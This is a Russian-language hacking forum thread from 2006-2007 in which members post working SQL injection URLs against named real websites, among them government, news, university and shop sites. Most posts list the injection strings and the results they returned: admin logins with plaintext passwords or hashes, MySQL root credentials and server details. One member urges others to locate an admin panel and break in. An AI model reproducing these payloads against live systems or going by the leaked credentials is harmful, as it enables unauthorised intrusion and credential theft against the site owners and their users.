SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    http://admin.org/EventView.php?event_id=-40+UNION+SELECT+VERSION()/*
     
  2. V1p-eR

    V1p-eR Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    Code:
    http://www.ursulduun.mn/index.php?action=menudata&id=-1+union+select+1,concat_ws(0x3a,pass,name),3+from+users/*
    admin:e00cf25ad42683b3df678c61f42c6bda
    Code:
    http://www.nikman.net/02/forum_topic.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
    user:u70311246@cgihos
    version:5.0.24a-log
    database:d60196308
     
    2 people like this.
  3. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    http://ekipage.com/2007/2007_year.html?item=-64+UNION+SELECT+1,2,3,4,5,6,7,'shell'/*
     
    1 person likes this.
  4. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.southworth.com/page.php?id=-130+union+select+concat_ws(0x3a,username)+from+users+limit+0,1/*
    Code:
     http://www.southworth.com/page.php?id=-130+union+select+concat_ws(0x3a,password)+from+users+limit+0,1/*
    login:kelly pass:meex
    login:Maryann pass:Meeks

    http://www.thefetus.net/
    Code:
    http://www.thefetus.net/page.php?id=-405+union+select+1,username,3,4,5,6,7,8,9,10,11,12,13,14+from+admin/*
    Code:
    http://www.thefetus.net/page.php?id=-405+union+select+1,password,3,4,5,6,7,8,9,10,11,12,13,14+from+admin/*
    thefetus : pj2698

    Code:
    http://youriddle.it/index.php?id=-1+union+select+user,password+from+user+limit+0,1/*
    ;)
     
    #2644 Extremal, 6 Jul 2007
    Last edited: 6 Jul 2007
    1 person likes this.
  5. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://fk.uni-mb.si/index.php?id=1+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
    Code:
    http://fk.uni-mb.si/index.php?id=1+union+select+1,2,3,4,password,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
    root : fkadmin
     
  6. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    сайт:www.triphopcr.net

    кол-во юзеров:1729

    Поля:имя,пасс,мэйл

    HTML:
    http://www.triphopcr.net/artista.php?id=-6+union+select+concat(username,char(58),password),email,3+from+users+limit+1729,1728/*
    Админ
    login:Javier
    pass:monsterchis
    mail:[email protected]
     
    1 person likes this.
  7. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    www.cotraj.ru
     
    1 person likes this.
  8. V1p-eR

    V1p-eR Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    Code:
    http://www.joelformayor.com/blog.php?name=full&id=-1+union+select+1,username,password,4,5+from+users+limit+0,1/*
    steebass:4aec6b4b0216e6ef

    Code:
    http://www.realty.lv/?lang=rus&id=-1+union+select+concat_ws(0x3a,login,pass)+from+user+limit+0,1/*
    9:45c48cce2e2d7fbdea1afc51c7c6ad26

    Code:
    http://www.allaboutjazz.com/php/news.php?id=-14411+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    allaboutjazz.com:таблицу с юзерами не нашел...
     
    #2648 V1p-eR, 7 Jul 2007
    Last edited: 7 Jul 2007
  9. hitex

    hitex Member

    Joined:
    25 May 2007
    Messages:
    13
    Likes Received:
    11
    Reputations:
    0
    газпром? )
    Code:
    http://ccgazprom.ru/?section=gloomery'+union+select+1,2,concat_ws(0x203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
     
  10. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Испанский хек портал:
    www.elhacker.org

    Code:
    http://www.elhacker.org/index.php?Ver=Articulo&Id=-339+union+select+1,2,version(),user(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    Таблы не подобрал, похоже на испанском =\
     
  11. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    1. www.bustur.ru
    Code:
    http://www.bustur.ru/t.php?id=-1+union+select+concat_ws(0x203a20,version(),user(),database())/*
    
    2. www.top-manager.ru
    Code:
    http://www.top-manager.ru/?a=1&id=116+union+select+version(),user(),3,4,database(),6,7,8/*
    
    3. www.iwdp.co.uk
    Code:
    http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,user(),version(),database(),5,6,7,8,9,10,11/*
    
    4. www.dog.ru
    Code:
    http://www.dog.ru/index.php3?mode=5&id=-1+union+select+1,id,3,4,5,6,7,8,9,10,11,12,name,email+from+users/*
    
    5. www.meteoprog.com.ua
    Code:
    http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+concat_ws(0x203a20,version(),user(),database())/*
    
     
    1 person likes this.
  12. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    помойму так лудше=)
    Таблица админа:
    Code:
    http://www.top-manager.ru/?a=1&id=116+union+select+username,2,3,4,passwd,6,7,8+from+adm+limit+0,1/*
    Таблица юзеров:
    Code:
    http://www.top-manager.ru/?a=1&id=116+union+select+login,2,3,4,passwd,6,7,8+from+users+limit+0,1/*
    P.S. Пасс админа в открытом виде так что можешь искать админку,и ломать ;)
     
    #2652 Extremal, 7 Jul 2007
    Last edited: 7 Jul 2007
    2 people like this.
  13. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Вот еще моя старая
    Code:
    http://meteoprog.com.ua/gorodMira.php?cityid=-1+union+select+1/*
     
  14. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    Вот еще парочка

    http://www.ozarkfolkcenter.com/country-store/shop.asp?cat=17&type=Fruit+Chunky'+union+select+@@version,2--

    http://www.gridrecordings.com/shop.asp?id=1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('Formats','Images','DataTypes','forum_posts','Samples','News','Artists','Admin','Discography','Tracks','Newsletter','forum_users','OrderDetails','Orders','Countries','Customers','Shipping','Products','FormatVariations','ShippingCosts','forum_forums','ShippingZones','Newsletters','GalleryFiles','newsletter_content','Audio','Links','Mailinglist','View_orders','Homepage','Artist_Extras','Artist_Charts','sysdiagrams','GalleryCat','Releases','Gallery','Banners','mailing_poster','mailing_view','comd_list','forum_topics','Labels'))--

    http://willow.thrilljockey.com/artists/index.html?id=10001+and+1=0+union+select+1,@@version,3,4--

    http://www.thamesvalley.co.uk/content/index.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.tables+WHERE+TABLE_NAME+NOT+IN+('cartV2','c2h_ContentPublish','CustomCharge','vwLateFIGrpPostCur','surfaceview_OrderDetails','mayfairtoys_Links','retailteam_SupplierProductLink','DateWatch'))--

    http://www.biztrav.co.nz/Shop.asp?id=85+or+1=(select+top+1+table_name+from+information_schema.tables)--
     
    2 people like this.
  15. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    Еще одна!

    http://www.orangescarf.com/shop.asp?cat=137+or+1=@@version--
     
  16. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    PR = 4

    Государственная инспекция связи

    Code:
    http:// www . gis.uz/index.php?part=news&lang=rus&snum=-40'+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x7a),0x7a),6+from+mysql.user/*
    root:root ;)

    PR = 6
    Национальное информационное агентство
    Code:
    http: / / www .uza.uz/documents/?id1=-22709+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x7a),0x7a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    4.1.15-Debian_0.dotdeb.4-log:uza@localhost:uza
     
    #2656 geezer.code, 8 Jul 2007
    Last edited: 8 Jul 2007
  17. V1p-eR

    V1p-eR Elder - Старейшина

    Joined:
    2 Jul 2007
    Messages:
    14
    Likes Received:
    15
    Reputations:
    0
    вот так выводится =)
    Code:
    http://www.deng-yun.com/new.php?tid=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a)+from+mysql.user/*
    root@localhost:menglida:4.1.18-max
    Code:
    http://www.deng-yun.com/new.php?tid=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),0x7a),0x7a)+from+mysql.user+limit+0,1/*
    root:*E60C5A74517ADD5F3CFACA0E8270CC8592A1218C
     
    #2657 V1p-eR, 8 Jul 2007
    Last edited: 8 Jul 2007
    2 people like this.
  18. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Code:
    http://www.zoosbank.mn/info_view.php?id=490%20union%20select%201,name,3,password,5,6,7,8,9,10%20from%20admin%20limit+0,1/*
    гмм... интересно, а есть на этот язык словарь?
     
    1 person likes this.
  19. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    http://lorientaliste.free.fr/annu.php?origine=-1+UNION+SELECT+1,2,3,4,5,char(241,234,243,235,255,32,229,225,224,242,252,32,229,229,32,226,32,240,238,242),7,8/*
     
  20. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Code:
    http://[COLOR=Green]www.buybrand.ru[/COLOR]/rus/index/news?id=780%20union%20select%201,2,name,4,5,6,7,8%20from%20users/*
    а пароли не нашел :mad:
     
Thread Status:
Not open for further replies.